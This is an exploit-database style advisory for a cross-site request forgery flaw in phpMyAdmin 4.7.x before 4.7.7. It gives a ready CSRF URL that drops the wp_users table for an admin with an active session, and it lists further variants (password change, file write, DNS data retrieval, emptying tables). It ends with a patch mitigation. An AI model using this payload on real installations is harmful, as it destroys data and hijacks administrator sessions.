vendor:
phpMyAdmin
by:
VulnSpy
8.8
CVSS
HIGH
Cross-Site Request Forgery
352
CWE
Product Name: phpMyAdmin
Affected Version From: 4.7.x
Affected Version To: 4.7.7
Patch Exists: YES
Related CWE: CVE-2017-1000499
CPE: a:phpmyadmin:phpmyadmin
Other Scripts:
N/A
Platforms Tested: php7 mysql5
2018
phpMyAdmin 4.7.x – Cross-Site Request Forgery
If victim DB Admin has active session with PhPMyAdmin < 4.7.7, Hitting this URL will result into DROP_TABLE, https://example.com/phpMyAdmin/sql.php?db=DATABASE_NAME&goto=db_structure.php&table=wp_users&reload=1&purge=1&sql_query=DROP+TABLE+%60wp_users%60&message_to_show=Table+wp_users+has+been+dropped. Exploit CSRF - Modifying the password of current user, Exploit CSRF - Arbitrary File Write, Exploit CSRF - Data Retrieval over DNS, Exploit CSRF - Empty All Rows From All Tables
Mitigation:
Ensure that the latest version of phpMyAdmin is installed and all security patches are applied.